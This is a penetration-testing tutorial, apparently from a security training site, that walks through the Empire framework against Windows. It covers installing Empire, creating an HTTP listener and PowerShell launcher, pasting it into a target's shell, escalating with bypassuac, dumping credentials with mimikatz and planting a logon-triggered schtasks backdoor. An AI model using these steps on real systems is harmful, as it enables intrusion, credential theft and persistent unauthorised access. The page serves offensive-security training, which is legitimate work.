[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire


Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It it not present on all installations of Windows, but can be added via a download from Microsoft.

There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the runline or in cmd.

Before going any further, read this presentation:

And see this quick description with handy hints:


Empire lets you run Powershell agents without needing Powershell to be installed on your target.

Here’s a good intro:

You may need to install Empire

git clone https://github.com/EmpireProject/Empire.git
cd Empire
chmod +x install.sh

Enter a password or let it generate one for you.


Create a listener

Start Empire:

# list listeners
# use the http listener
uselistener http
# now our listener should show up:

Create a PowerShell script and send it to your victim using the launcher

Create a launcher:


Generate a Powershell script with the listener name http:

 launcher powershell http

Copy the resulting Powershell script.

Open a new terminal and start a remote desktop session: (this is noisy, so consider terminal alternatives)

rdesktop -u IEUser -p password

In the remote desktop, open a cmd shell and paste in the script. Hit Enter.

Back in the Linux Empire terminal session, see that there is now an agent active.

In this terminal go back to the main window:


List available agents:


Note the Name of the agent. It’s random and complex, so rename it:

 rename [old name] [new name]

Now to list the active agents enter:


Interact with our agent:

 interact http

Get info on the agent:


High_integrity 0 means we’re not an admin.

Become an admin, amazingly, with a single command, followed by the name of the listener:

bypassuac http

Now type:


Note the new listener and the user names listed. An asterisk indicates a power user. Rename this new listener too:

rename [old name] [new name]

Now let’s interact with the new agent:

interact [agent name]

High_integrity 1 now indicates we’re admin!

List all extracted passwords (there aren’t any yet):


Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.


Once it’s done type:


and see the cracked passwords.

Create a persistent backdoor with the module schtasks:

usemodule persistence/elevated/schtasks
# check its options
# set
set OnLogon True
set Listener http
# exploit!

Now our backdoor will execute every time the user logs on.